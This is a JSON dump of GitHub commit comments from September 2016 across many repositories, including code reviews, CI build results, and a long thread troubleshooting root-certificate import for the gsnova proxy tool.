{"id":"4545165363","type":"CommitCommentEvent","actor":{"login":"vitr"},"repo":{"name":"igrigorik/ga-beacon"},"payload":{"comment":{"id":18975922,"position":null,"line":null,"path":null,"commit_id":"6acd8627bb7be36f24f5516e9873c92719a50e55","created_at":"2016-09-11T03:42:53Z","updated_at":"2016-09-11T03:42:53Z","body":"I don't get, how is this really helping us? in the topic https://github.com/github/markup/issues/224#issuecomment-33454537 they discuss issues with badges, e.g. if you have a new etag github will bust the cache and you can see updated badge. How does it work for the beacon? do we need to  generate Etags randomly on every request? but this does not solve the core issue, in the analytics you will see github robot not the original visitor. just my $0.02"}},"created_at":"2016-09-11T03:42:53Z"}
{"id":"4545167319","type":"CommitCommentEvent","actor":{"login":"yuan78"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18975925,"position":null,"line":null,"path":null,"commit_id":"54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361","created_at":"2016-09-11T03:44:57Z","updated_at":"2016-09-11T03:44:57Z","body":"But the fakecert still hv problem,  when  visit many website still will\nreport HTTPS error of your link is not a private link such as ipleak.net ,\nvultr.com etc.  only google and youbute is OK\n\nWhat's the root cause?\n\n2016-09-11 11:36 GMT+08:00 Gary <kingtopest9000@gmail.com>:\n\n> I hv updated your latest gae remote(disable chacha20) and update the\n> google IP with GWS IP, it's OK now, it turned out  not to be the issue of\n> fakecert .\n>\n> But it seems gsnova cannot support GVS IP for GAE but only support GWS IP.\n> Can you let gsnova support GVS IP (to change cypher method can achieve it,\n> you can refer to Goproxy of phuslu for details ), THX!\n>\n> 2016-09-11 11:18 GMT+08:00 yinqiwen <notifications@github.com>:\n>\n>> and the gae support in gsnova is not stable enough, i suggest u use\n>> paas/vps mode which is more stable and have no need to import the fakecert\n>> file.\n>>\n>> yinqiwen <yinqiwen@gmail.com>于2016年9月11日周日 上午11:14写道：\n>>\n>>\n>> > are u using firefox? firefox use different way to verify the root CA\n>> > file, Chrome/IE use system's root CA store. u can google how to import\n>> the\n>> > root CA file for firefox.\n>> >\n>> > yuan78 <notifications@github.com>于2016年9月11日周日 上午10:35写道：\n>> >\n>> >> Yes, already import the fakecert into trusted root certification\n>> >> authorities, but still cannot work and always report \"your link is not\n>> a\n>> >> private link\" . Also the same result to Ubuntu platform\n>> >> Can u test it from your side?\n>> >>\n>> >> 2016-09-11 10:00 GMT+08:00 yinqiwen <notifications@github.com>:\n>> >>\n>> >> > the cert file must be added into trusted root certification\n>> authorities\n>> >> > store. This is a example\n>> >> > https://blogs.technet.microsoft.com/sbs/2008/05/08/\n>> >> > installing-a-self-signed-certificate-as-a-trusted-root-\n>> >> > ca-in-windows-vista/\n>> >> >\n>> >> > 2016年9月11日 上午9:25，\"yuan78\" <notifications@github.com>写道：\n>> >> >\n>> >> > > Have imported fakecert, but the browser Chrome still report https\n>> >> error\n>> >> > of\n>> >> > > \"your link is not a private link\"\n>> >> > >\n>> >> > > 2016-09-10 23:40 GMT+08:00 yinqiwen <notifications@github.com>:\n>> >> > >\n>> >> > > > Add your ip into hosts.json. For gae, u should configure your ip\n>> for\n>> >> > '*.\n>> >> > > > appspot.com' .\n>> >> > > >\n>> >> > > > For fakecert issue, u must import the\n>> 'Fake-ACRoot-Certificate.cer'\n>> >> > into\n>> >> > > > your os's root CA to avoid the warnings of browsers, u can follow\n>> >> > 12306's\n>> >> > > > guide to import a root CA file. (12306 force u to import it's\n>> root\n>> >> CA\n>> >> > > file\n>> >> > > > if u want to use it's service.)\n>> >> > > >\n>> >> > > > u can generate the facecert files by openssl's command line\n>> tools,\n>> >> but\n>> >> > > > it's complicated and i'm not remember how to do it now, can not\n>> give\n>> >> > any\n>> >> > > > advice.\n>> >> > > >\n>> >> > > > —\n>> >> > > > You are receiving this because you commented.\n>> >> > > > Reply to this email directly, view it on GitHub\n>> >> > > > <https://github.com/yinqiwen/gsnova/commit/\n>> >> > > 54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18974012>,\n>> >> > > > or mute the thread\n>> >> > > > <https://github.com/notifications/unsubscribe-auth/AK_\n>> >> > > y78F4q51vGBuBjmWYsGZI0uNCwYwiks5qos9hgaJpZM4J5oQB>\n>> >> > > > .\n>> >> > > >\n>> >> > >\n>> >> > > —\n>> >> > > You are receiving this because you authored the thread.\n>> >> > > Reply to this email directly, view it on GitHub\n>> >> > > <https://github.com/yinqiwen/gsnova/commit/\n>> >> > 54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18975617>,\n>> >> > > or mute the thread\n>> >> > > <https://github.com/notifications/unsubscribe-auth/\n>> >> > AANmT0eqmWquNK2el3MjABw0GcS84g6Yks5qo1iIgaJpZM4J5oQB>\n>> >> >\n>> >> > > .\n>> >> > >\n>> >> >\n>> >> > —\n>> >> > You are receiving this because you commented.\n>> >> > Reply to this email directly, view it on GitHub\n>> >> > <\n>> >> https://github.com/yinqiwen/gsnova/commit/54e857c7c7e1b7996f\n>> 88d075b0b1ec2a9d1d2361#commitcomment-18975681\n>> >> >,\n>> >> > or mute the thread\n>> >> > <\n>> >> https://github.com/notifications/unsubscribe-auth/AK_y729lEU\n>> Aaewvv8nY3I0BCa_rShYe_ks5qo2CygaJpZM4J5oQB\n>> >> >\n>> >> > .\n>> >> >\n>> >>\n>> >> —\n>> >> You are receiving this because you authored the thread.\n>> >> Reply to this email directly, view it on GitHub\n>> >> <https://github.com/yinqiwen/gsnova/commit/54e857c7c7e1b7996\n>> f88d075b0b1ec2a9d1d2361#commitcomment-18975790>,\n>> >> or mute the thread\n>> >> <https://github.com/notifications/unsubscribe-auth/AANmTzbhZ\n>> TS9ZWv859c7Kc5mnwsxMPogks5qo2jXgaJpZM4J5oQB>\n>> >> .\n>> >>\n>> > --\n>> > yinqiwen\n>> >\n>> --\n>> yinqiwen\n>>\n>> —\n>> You are receiving this because you commented.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/yinqiwen/gsnova/commit/54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18975879>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AK_y71MNli95bADlXMomvYCAeKY8R7aYks5qo3MSgaJpZM4J5oQB>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-11T03:44:57Z"}
{"id":"4545169746","type":"CommitCommentEvent","actor":{"login":"oscarAG"},"repo":{"name":"d3demacia/Search-Summoner-in-Lol"},"payload":{"comment":{"id":18975927,"position":null,"line":null,"path":null,"commit_id":"03740df59841114d0c5d0da83b25f6f3f8288301","created_at":"2016-09-11T03:47:37Z","updated_at":"2016-09-11T03:47:37Z","body":"Lol thanks for not using my key "}},"created_at":"2016-09-11T03:47:37Z"}
{"id":"4545170392","type":"CommitCommentEvent","actor":{"login":"IasacDaGamer288"},"repo":{"name":"PocketEssential/OneInTheChamber"},"payload":{"comment":{"id":18975928,"position":null,"line":null,"path":null,"commit_id":"068d03f0dbe91ea200a67cd60a3870133baddc1d","created_at":"2016-09-11T03:48:12Z","updated_at":"2016-09-11T03:48:12Z","body":"I Totally did"}},"created_at":"2016-09-11T03:48:12Z"}
{"id":"4545172748","type":"CommitCommentEvent","actor":{"login":"PhantomAssassin12"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18975931,"position":null,"line":null,"path":null,"commit_id":"3ace3ce28625b580113bc8e513ce7e671b9538a2","created_at":"2016-09-11T03:50:46Z","updated_at":"2016-09-11T03:50:46Z","body":"did build successfully? and boot up?"}},"created_at":"2016-09-11T03:50:46Z"}
{"id":"4545172756","type":"CommitCommentEvent","actor":{"login":"yantongtong"},"repo":{"name":"yantongtong/helloworld"},"payload":{"comment":{"id":18975932,"position":null,"line":null,"path":null,"commit_id":"0aeceb188dcedc22b4e989ee0f01030472edb06b","created_at":"2016-09-11T03:50:47Z","updated_at":"2016-09-11T03:50:47Z","body":"kkkkkkkkkkk"}},"created_at":"2016-09-11T03:50:47Z"}
{"id":"4545173182","type":"CommitCommentEvent","actor":{"login":"spikers"},"repo":{"name":"spikers/Disrupt2016"},"payload":{"comment":{"id":18975933,"position":null,"line":null,"path":null,"commit_id":"0406c5be68a8e7a14fa1bb1a0412651089538130","created_at":"2016-09-11T03:51:13Z","updated_at":"2016-09-11T03:51:13Z","body":"This is a quick check"}},"created_at":"2016-09-11T03:51:13Z"}
{"id":"4545174726","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18975935,"position":null,"line":null,"path":null,"commit_id":"3ace3ce28625b580113bc8e513ce7e671b9538a2","created_at":"2016-09-11T03:53:02Z","updated_at":"2016-09-11T03:53:02Z","body":"Yeah, I booted, but just crask like AOSP 7.\n\n2016-09-11 10:50 GMT+07:00 PhantomAssassin12 <notifications@github.com>:\n\n> did build successfully? and boot up?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ngoquang2708/android_device_samsung_vivalto3gvn/commit/3ace3ce28625b580113bc8e513ce7e671b9538a2#commitcomment-18975931>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJOl9nEv627kiozh8s4pRA3MbfSb0-6vks5qo3qXgaJpZM4J54sr>\n> .\n>\n"}},"created_at":"2016-09-11T03:53:02Z"}
{"id":"4545175611","type":"CommitCommentEvent","actor":{"login":"darkdh"},"repo":{"name":"brave/electron"},"payload":{"comment":{"id":18975937,"position":null,"line":null,"path":null,"commit_id":"711a025f83191a61f0100a8060b68478be177826","created_at":"2016-09-11T03:54:03Z","updated_at":"2016-09-11T03:54:03Z","body":"++"}},"created_at":"2016-09-11T03:54:03Z"}
{"id":"4545177252","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18975940,"position":null,"line":null,"path":null,"commit_id":"fa4c02cb51cdb7eec7a4cc10ec0ed7d6a1e2c3ff","created_at":"2016-09-11T03:56:00Z","updated_at":"2016-09-11T03:56:00Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-11T03:56:00Z"}
{"id":"4545178279","type":"CommitCommentEvent","actor":{"login":"PhantomAssassin12"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18975941,"position":null,"line":null,"path":null,"commit_id":"3ace3ce28625b580113bc8e513ce7e671b9538a2","created_at":"2016-09-11T03:57:13Z","updated_at":"2016-09-11T03:57:13Z","body":":("}},"created_at":"2016-09-11T03:57:13Z"}
{"id":"4545180702","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"classicdb/database"},"payload":{"comment":{"id":18975943,"position":null,"line":null,"path":null,"commit_id":"492dc29e4345f0cbed289987cf2da1ed9bdf35fb","created_at":"2016-09-11T03:59:49Z","updated_at":"2016-09-11T03:59:49Z","body":"false alarm, I have done them in hexadecimal here, was thinking I had done them wrong but it's fine actually.\r\n\r\n@Grz3s They're set here in Hexadecimal so they should actually be fine. I will update the PR on udb as that unit surely should only have the flags that they need, but these ones for these units actually are fine. Let's talk about this later when we're both on IRC and I'll try to explain."}},"created_at":"2016-09-11T03:59:49Z"}
{"id":"4545183897","type":"CommitCommentEvent","actor":{"login":"rametal"},"repo":{"name":"Lunat1q/Catchem-PoGo"},"payload":{"comment":{"id":18975947,"position":null,"line":null,"path":null,"commit_id":"1aa326148e1e91aa8c1e013c5c3ecaec11cb42b2","created_at":"2016-09-11T04:02:39Z","updated_at":"2016-09-11T04:02:39Z","body":"any way to add a bulk transfer/evolve? Also ability to use a lucky egg and bulk evolve would be amazing! \r\n\r\nThanks so much!!"}},"created_at":"2016-09-11T04:02:39Z"}
{"id":"4545194273","type":"CommitCommentEvent","actor":{"login":"SilverAmadeus"},"repo":{"name":"SilverAmadeus/Practica_LCG"},"payload":{"comment":{"id":18975956,"position":null,"line":null,"path":null,"commit_id":"38c11130370a52adbb96d35e1c313859eca65a5f","created_at":"2016-09-11T04:12:20Z","updated_at":"2016-09-11T04:12:20Z","body":"En `controlCamara` en `else if (tipoCamara == 2)` ya está completo.\r\n```\r\n{\r\ncamara2.angCam -= camara2.velCam;\r\nif (camara2.angCam < 360.0f)\r\ncamara2.angCam -= 360.0f;\r\n\r\ncamara2.dirCam.x = cos(camara2.angCam*PI / 180.0f);\r\ncamara2.dirCam.z = sin(camara2.angCam*PI / 180.0f);\r\n\r\ncamara2.posCam.x = camara2.dirCam.x*camara2.distCam;\r\ncamara2.posCam.z = camara2.dirCam.z*camara2.distCam;\r\n\r\n}\r\n```\r\nSe usa la ultima poscion que tuvo la direccion de la camara como\r\nposicion actual y se multiplica por un escalar para formar el radio del\r\ncirculo que va recorrer la camara a lo largo del stage\r\n\r\nEn `if (funcion == 1)` y  `if (funcion == 2)` \r\nCada que se presiona el boton se aumenta el escalar por el cual se va\r\nmultiplicar el vector `camara2.posCam.x` y `camara2.posCam.z`.\r\n\r\n```\r\nif (funcion == 1) //Disminuye radio de la camara\r\n{\r\nif (camara2.distCam == 20.0f)\r\n{\r\ncamara2.distCam = camara2.distCam;\r\n}\r\nelse\r\n{\r\ncamara2.distCam -= 0.5f;\r\n}\r\ncamara2.posCam.x = camara2.dirCam.x*camara2.distCam;\r\ncamara2.posCam.z = camara2.dirCam.z*camara2.distCam;\r\n}\r\n```\r\n\r\n# TODO\r\n* Checar si todas las funciones de las camaras funcionan como deben"}},"created_at":"2016-09-11T04:12:20Z"}
{"id":"4545194775","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18975957,"position":null,"line":null,"path":null,"commit_id":"57127b7bfffa174f2de8d92e19d8d6865529eae1","created_at":"2016-09-11T04:12:47Z","updated_at":"2016-09-11T04:12:47Z","body":"fix_gcc48_ICE (mbadams5) - i386-Windows-7-VisualStudio-12: OK (2333 of 2334 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57127b7bfffa174f2de8d92e19d8d6865529eae1-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57127b7bfffa174f2de8d92e19d8d6865529eae1-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-11T04:12:47Z"}
{"id":"4545195711","type":"CommitCommentEvent","actor":{"login":"xZeroMCPE"},"repo":{"name":"PocketEssential/OneInTheChamber"},"payload":{"comment":{"id":18975958,"position":null,"line":null,"path":null,"commit_id":"068d03f0dbe91ea200a67cd60a3870133baddc1d","created_at":"2016-09-11T04:13:45Z","updated_at":"2016-09-11T04:13:45Z","body":"xD"}},"created_at":"2016-09-11T04:13:45Z"}
{"id":"4545196772","type":"CommitCommentEvent","actor":{"login":"senakamura"},"repo":{"name":"jcarreon808/Context-Exercise"},"payload":{"comment":{"id":18975960,"position":33,"line":33,"path":"context.js","commit_id":"2fb337bb21aee80188856ea40c0618f2260eb580","created_at":"2016-09-11T04:14:48Z","updated_at":"2016-09-11T04:14:48Z","body":"While in the end you produced the correct result -- however documents say to **bind** `add` to `calculate` then invoke `calculate` with the arguments `drinking` and `beer`. \r\n\r\nYou should not be hardcoding values or arguments when you bind to other objects. "}},"created_at":"2016-09-11T04:14:48Z"}
{"id":"4545199824","type":"CommitCommentEvent","actor":{"login":"senakamura"},"repo":{"name":"bchoe/Context-Exercise"},"payload":{"comment":{"id":18975962,"position":41,"line":42,"path":"context.js","commit_id":"06154dc3a0ec335f818b1905632fc5aee08d738a","created_at":"2016-09-11T04:17:46Z","updated_at":"2016-09-11T04:17:46Z","body":"While in the end you produced the correct result -- however documents say to bind add to calculate then invoke calculate with the arguments drinking and beer.\r\n\r\nYou should not be hardcoding values or arguments when you bind to other objects."}},"created_at":"2016-09-11T04:17:46Z"}
{"id":"4545200586","type":"CommitCommentEvent","actor":{"login":"senakamura"},"repo":{"name":"bchoe/Context-Exercise"},"payload":{"comment":{"id":18975966,"position":34,"line":35,"path":"context.js","commit_id":"06154dc3a0ec335f818b1905632fc5aee08d738a","created_at":"2016-09-11T04:18:28Z","updated_at":"2016-09-11T04:18:28Z","body":"this function is not needed anymore. "}},"created_at":"2016-09-11T04:18:28Z"}
{"id":"4545200591","type":"CommitCommentEvent","actor":{"login":"KairusDarkSeeker"},"repo":{"name":"PocketEssential/OneInTheChamber"},"payload":{"comment":{"id":18975967,"position":null,"line":null,"path":null,"commit_id":"068d03f0dbe91ea200a67cd60a3870133baddc1d","created_at":"2016-09-11T04:18:28Z","updated_at":"2016-09-11T04:18:28Z","body":"shut the fuck up isaac"}},"created_at":"2016-09-11T04:18:28Z"}
{"id":"4545201645","type":"CommitCommentEvent","actor":{"login":"loriab"},"repo":{"name":"jturney/levmar"},"payload":{"comment":{"id":18975968,"position":88,"line":88,"path":"cmake/Psi4Macros.cmake","commit_id":"21231f907911e0a8322cdc7c539b58a2c15ebb0f","created_at":"2016-09-11T04:19:24Z","updated_at":"2016-09-11T04:19:24Z","body":"Maybe you're working from an older external repo, but the current state of Psi4Macros, like https://github.com/psi4/libefp/blob/master/cmake/Psi4Macros.cmake#L88-L90, avoids adding the Fortran compile checking module to non-Fortran projects."}},"created_at":"2016-09-11T04:19:24Z"}
{"id":"4545203103","type":"CommitCommentEvent","actor":{"login":"addyosmani"},"repo":{"name":"GoogleChrome/accessibility-developer-tools"},"payload":{"comment":{"id":18975970,"position":null,"line":null,"path":null,"commit_id":"aecb168921c3ec49ef4f96e8442d02817a269bb8","created_at":"2016-09-11T04:20:25Z","updated_at":"2016-09-11T04:20:25Z","body":"In case anyone wonders later: due to build issues with the release script these got pushed early. I'm going to correct this up."}},"created_at":"2016-09-11T04:20:25Z"}
{"id":"4545204377","type":"CommitCommentEvent","actor":{"login":"karthick111"},"repo":{"name":"CarbonROM/android_device_xiaomi_armani"},"payload":{"comment":{"id":18975971,"position":null,"line":null,"path":null,"commit_id":"87baecb19aa6c48c89d24ed5412e2ce0dc022844","created_at":"2016-09-11T04:21:19Z","updated_at":"2016-09-11T04:21:19Z","body":"very nice bringup \r\nhttps://github.com/CarbonROM/android_vendor_carbon/tree/lp5.1.1/config \r\nhave a look here :| "}},"created_at":"2016-09-11T04:21:19Z"}
{"id":"4545204579","type":"CommitCommentEvent","actor":{"login":"loriab"},"repo":{"name":"jturney/levmar"},"payload":{"comment":{"id":18975972,"position":32,"line":32,"path":"levmarConfig.cmake.in","commit_id":"21231f907911e0a8322cdc7c539b58a2c15ebb0f","created_at":"2016-09-11T04:21:34Z","updated_at":"2016-09-11T04:21:34Z","body":"Don't need the fortran bit– it's for adding Fortran projects like dkh & gdma to a project(... LANGUAGE C CXX) like psi4_core."}},"created_at":"2016-09-11T04:21:34Z"}
{"id":"4545205493","type":"CommitCommentEvent","actor":{"login":"xZeroMCPE"},"repo":{"name":"PocketEssential/OneInTheChamber"},"payload":{"comment":{"id":18975973,"position":null,"line":null,"path":null,"commit_id":"068d03f0dbe91ea200a67cd60a3870133baddc1d","created_at":"2016-09-11T04:22:33Z","updated_at":"2016-09-11T04:22:33Z","body":"lmao"}},"created_at":"2016-09-11T04:22:33Z"}
{"id":"4545206577","type":"CommitCommentEvent","actor":{"login":"Albemode"},"repo":{"name":"6ytrenches/cleanE"},"payload":{"comment":{"id":18975974,"position":null,"line":null,"path":null,"commit_id":"eccf46d393c141ca698f85917c6f2889dd9584e4","created_at":"2016-09-11T04:23:35Z","updated_at":"2016-09-11T04:23:35Z","body":"This should do"}},"created_at":"2016-09-11T04:23:35Z"}
{"id":"4545206903","type":"CommitCommentEvent","actor":{"login":"daynewright"},"repo":{"name":"nss-day-cohort-15/pinterest-d15-team-winterest"},"payload":{"comment":{"id":18975975,"position":null,"line":null,"path":null,"commit_id":"913483e42f20d0210c3855783008f5ed3c088505","created_at":"2016-09-11T04:23:54Z","updated_at":"2016-09-11T04:23:54Z","body":"The drag and drop works, but only for the current page and session.  It does not save and change the order in Firebase (not sure if that is possible)."}},"created_at":"2016-09-11T04:23:54Z"}
{"id":"4545207625","type":"CommitCommentEvent","actor":{"login":"nElder03"},"repo":{"name":"nElder03/dota_imba"},"payload":{"comment":{"id":18975976,"position":null,"line":null,"path":null,"commit_id":"95c941d990b5a7997b0b29775772ebcdc99cbb8e","created_at":"2016-09-11T04:24:33Z","updated_at":"2016-09-11T04:24:33Z","body":"This commit was the final culmination of me fixing the file that was addon_english.txt.\r\n\r\nI tried my best to make sure nothing was broken. Either way, many spelling errors, capitalization mistakes, general formatting issues, organizational issues, etc. were fixed. The file should now be readable and neat (on GitHub, at least -- If you're going to view the file in a program like Atom or similar, make sure to use HARD tabs, not soft tabs, and set spacing to 8 spaces)."}},"created_at":"2016-09-11T04:24:33Z"}
{"id":"4545214934","type":"CommitCommentEvent","actor":{"login":"KairusDarkSeeker"},"repo":{"name":"PocketEssential/OneInTheChamber"},"payload":{"comment":{"id":18975980,"position":null,"line":null,"path":null,"commit_id":"068d03f0dbe91ea200a67cd60a3870133baddc1d","created_at":"2016-09-11T04:31:30Z","updated_at":"2016-09-11T04:31:30Z","body":"lol"}},"created_at":"2016-09-11T04:31:30Z"}
{"id":"4545215660","type":"CommitCommentEvent","actor":{"login":"senakamura"},"repo":{"name":"SpaceToastCoastToCoast/Context-Exercise"},"payload":{"comment":{"id":18975981,"position":20,"line":29,"path":"context.js","commit_id":"059294f8717ebe15ea7b0b6cf6059be4b95244c0","created_at":"2016-09-11T04:32:13Z","updated_at":"2016-09-11T04:32:13Z","body":"While this still works (in this instance) -- always declare variables and never just simply state them. This can lead to scope issues in the future, make this a habit. "}},"created_at":"2016-09-11T04:32:13Z"}
{"id":"4545220321","type":"CommitCommentEvent","actor":{"login":"SMiiCK"},"repo":{"name":"allanpcc/FP-Hitchhiker-s-Guide-to-Operating-Systems"},"payload":{"comment":{"id":18975985,"position":6,"line":13,"path":"README.md","commit_id":"72b6e18020c3897e0fb0005d35730ace495feeb7","created_at":"2016-09-11T04:37:01Z","updated_at":"2016-09-11T04:37:01Z","body":"Excelente, siempre me agrada tu aportación :+1: "}},"created_at":"2016-09-11T04:37:01Z"}
{"id":"4545220670","type":"CommitCommentEvent","actor":{"login":"afuous"},"repo":{"name":"mortorqrobotics/morteam-web"},"payload":{"comment":{"id":18975986,"position":null,"line":null,"path":null,"commit_id":"25b96815b4fca73308e5cdd638405208ad64e199","created_at":"2016-09-11T04:37:21Z","updated_at":"2016-09-11T04:37:21Z","body":"What if the user's team is not in the locations list? (it is incomplete)"}},"created_at":"2016-09-11T04:37:21Z"}
{"id":"4545224442","type":"CommitCommentEvent","actor":{"login":"atamariya"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18975991,"position":null,"line":null,"path":null,"commit_id":"cc0b4f4b64247028fb7aac857f344e0bda8f2a8f","created_at":"2016-09-11T04:41:09Z","updated_at":"2016-09-11T04:41:09Z","body":"- Netty can handle larger number of concurrent requests better. Some renderers like WMP insists on making huge requests (1000 at a time). You'll definitely see performance benefits for large libraries. \r\n- 4.0 is the future.\r\n- Let netty developers focus on the web-server aspect and benefit from simply using the library."}},"created_at":"2016-09-11T04:41:09Z"}
{"id":"4545224626","type":"CommitCommentEvent","actor":{"login":"yinqiwen"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18975992,"position":null,"line":null,"path":null,"commit_id":"54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361","created_at":"2016-09-11T04:41:18Z","updated_at":"2016-09-11T04:41:18Z","body":"There is a default rule which would forward all https traffic of Google's\nsite directly to the IP u configured in hosts.json, there is no need to\nfake cert for this situation. The fake root cause file is still not\nimported correctly in your env.\n\n2016年9月11日 上午11:45，\"yuan78\" <notifications@github.com>写道：\n\n> But the fakecert still hv problem, when visit many website still will\n> report HTTPS error of your link is not a private link such as ipleak.net ,\n> vultr.com etc. only google and youbute is OK\n>\n> What's the root cause?\n>\n> 2016-09-11 11:36 GMT+08:00 Gary <kingtopest9000@gmail.com>:\n>\n> > I hv updated your latest gae remote(disable chacha20) and update the\n> > google IP with GWS IP, it's OK now, it turned out not to be the issue of\n> > fakecert .\n> >\n> > But it seems gsnova cannot support GVS IP for GAE but only support GWS\n> IP.\n> > Can you let gsnova support GVS IP (to change cypher method can achieve\n> it,\n> > you can refer to Goproxy of phuslu for details ), THX!\n> >\n> > 2016-09-11 11:18 GMT+08:00 yinqiwen <notifications@github.com>:\n> >\n> >> and the gae support in gsnova is not stable enough, i suggest u use\n> >> paas/vps mode which is more stable and have no need to import the\n> fakecert\n> >> file.\n> >>\n> >> yinqiwen <yinqiwen@gmail.com>于2016年9月11日周日 上午11:14写道：\n> >>\n> >>\n> >> > are u using firefox? firefox use different way to verify the root CA\n> >> > file, Chrome/IE use system's root CA store. u can google how to import\n> >> the\n> >> > root CA file for firefox.\n> >> >\n> >> > yuan78 <notifications@github.com>于2016年9月11日周日 上午10:35写道：\n> >> >\n> >> >> Yes, already import the fakecert into trusted root certification\n> >> >> authorities, but still cannot work and always report \"your link is\n> not\n> >> a\n> >> >> private link\" . Also the same result to Ubuntu platform\n> >> >> Can u test it from your side?\n> >> >>\n> >> >> 2016-09-11 10:00 GMT+08:00 yinqiwen <notifications@github.com>:\n> >> >>\n> >> >> > the cert file must be added into trusted root certification\n> >> authorities\n> >> >> > store. This is a example\n> >> >> > https://blogs.technet.microsoft.com/sbs/2008/05/08/\n> >> >> > installing-a-self-signed-certificate-as-a-trusted-root-\n> >> >> > ca-in-windows-vista/\n> >> >> >\n> >> >> > 2016年9月11日 上午9:25，\"yuan78\" <notifications@github.com>写道：\n> >> >> >\n> >> >> > > Have imported fakecert, but the browser Chrome still report https\n> >> >> error\n> >> >> > of\n> >> >> > > \"your link is not a private link\"\n> >> >> > >\n> >> >> > > 2016-09-10 23:40 GMT+08:00 yinqiwen <notifications@github.com>:\n> >> >> > >\n> >> >> > > > Add your ip into hosts.json. For gae, u should configure your\n> ip\n> >> for\n> >> >> > '*.\n> >> >> > > > appspot.com' .\n> >> >> > > >\n> >> >> > > > For fakecert issue, u must import the\n> >> 'Fake-ACRoot-Certificate.cer'\n> >> >> > into\n> >> >> > > > your os's root CA to avoid the warnings of browsers, u can\n> follow\n> >> >> > 12306's\n> >> >> > > > guide to import a root CA file. (12306 force u to import it's\n> >> root\n> >> >> CA\n> >> >> > > file\n> >> >> > > > if u want to use it's service.)\n> >> >> > > >\n> >> >> > > > u can generate the facecert files by openssl's command line\n> >> tools,\n> >> >> but\n> >> >> > > > it's complicated and i'm not remember how to do it now, can not\n> >> give\n> >> >> > any\n> >> >> > > > advice.\n> >> >> > > >\n> >> >> > > > —\n> >> >> > > > You are receiving this because you commented.\n> >> >> > > > Reply to this email directly, view it on GitHub\n> >> >> > > > <https://github.com/yinqiwen/gsnova/commit/\n> >> >> > > 54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-\n> 18974012>,\n> >> >> > > > or mute the thread\n> >> >> > > > <https://github.com/notifications/unsubscribe-auth/AK_\n> >> >> > > y78F4q51vGBuBjmWYsGZI0uNCwYwiks5qos9hgaJpZM4J5oQB>\n> >> >> > > > .\n> >> >> > > >\n> >> >> > >\n> >> >> > > —\n> >> >> > > You are receiving this because you authored the thread.\n> >> >> > > Reply to this email directly, view it on GitHub\n> >> >> > > <https://github.com/yinqiwen/gsnova/commit/\n> >> >> > 54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18975617>,\n> >> >> > > or mute the thread\n> >> >> > > <https://github.com/notifications/unsubscribe-auth/\n> >> >> > AANmT0eqmWquNK2el3MjABw0GcS84g6Yks5qo1iIgaJpZM4J5oQB>\n> >> >> >\n> >> >> > > .\n> >> >> > >\n> >> >> >\n> >> >> > —\n> >> >> > You are receiving this because you commented.\n> >> >> > Reply to this email directly, view it on GitHub\n> >> >> > <\n> >> >> https://github.com/yinqiwen/gsnova/commit/54e857c7c7e1b7996f\n> >> 88d075b0b1ec2a9d1d2361#commitcomment-18975681\n> >> >> >,\n> >> >> > or mute the thread\n> >> >> > <\n> >> >> https://github.com/notifications/unsubscribe-auth/AK_y729lEU\n> >> Aaewvv8nY3I0BCa_rShYe_ks5qo2CygaJpZM4J5oQB\n> >> >> >\n> >> >> > .\n> >> >> >\n> >> >>\n> >> >> —\n> >> >> You are receiving this because you authored the thread.\n> >> >> Reply to this email directly, view it on GitHub\n> >> >> <https://github.com/yinqiwen/gsnova/commit/54e857c7c7e1b7996\n> >> f88d075b0b1ec2a9d1d2361#commitcomment-18975790>,\n> >> >> or mute the thread\n> >> >> <https://github.com/notifications/unsubscribe-auth/AANmTzbhZ\n> >> TS9ZWv859c7Kc5mnwsxMPogks5qo2jXgaJpZM4J5oQB>\n> >> >> .\n> >> >>\n> >> > --\n> >> > yinqiwen\n> >> >\n> >> --\n> >> yinqiwen\n> >>\n> >> —\n> >> You are receiving this because you commented.\n> >> Reply to this email directly, view it on GitHub\n> >> <https://github.com/yinqiwen/gsnova/commit/\n> 54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18975879>,\n> >> or mute the thread\n> >> <https://github.com/notifications/unsubscribe-auth/AK_\n> y71MNli95bADlXMomvYCAeKY8R7aYks5qo3MSgaJpZM4J5oQB>\n> >> .\n> >>\n> >\n> >\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> 